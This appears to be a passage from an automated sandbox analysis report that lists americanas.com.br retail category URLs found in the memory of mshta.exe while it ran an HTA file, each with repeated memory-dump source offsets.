Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/colchao?chave=pfm_hm_tt_1_0_colchao
Source: mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/colchao?chave=pfm_hm_tt_1_0_colchaohttps://www.americ
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cozinha-compacta?chave=pfm_hm_tt_1_0_cozinha-compacta
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/cozinha-modulada?chave=pfm_hm_tt_1_0_cozinha-modulada
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/cadeiras-para-escritorio
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/mesas-para-escritorio
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/poltrona?chave=pfm_hm_tt_1_0_poltrona
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-completo?chave=pfm_hm_tt_1_0_quarto-completo
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-e-colchao/guarda-roupa
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/cadeira?chave=pfm_hm_tt_1_0_cadeira
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/rack-com-painel
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-jantar?chave=pfm_hm_tt_1_0_sala-de-jantar
Source: mshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofa
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveis
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveismeta.largemeta.large.heightmeta.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_hm_tt_1_0_moveis
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_home_moveis_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelaria
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelariameta.largemeta.large.heigh
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=pfm_home_papelaria_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/pc-gamer?chave=pfm_home_pcgamer_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/pet-shop?chave=pfm_home_petshop_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/relogios-e-joias/relogios?chave=pfm_home_relogios_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menu
Source: mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menuhttps://www.ameri
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/sinalizacao-e-seguranca?chave=pfm_home_sinalizacao_menu
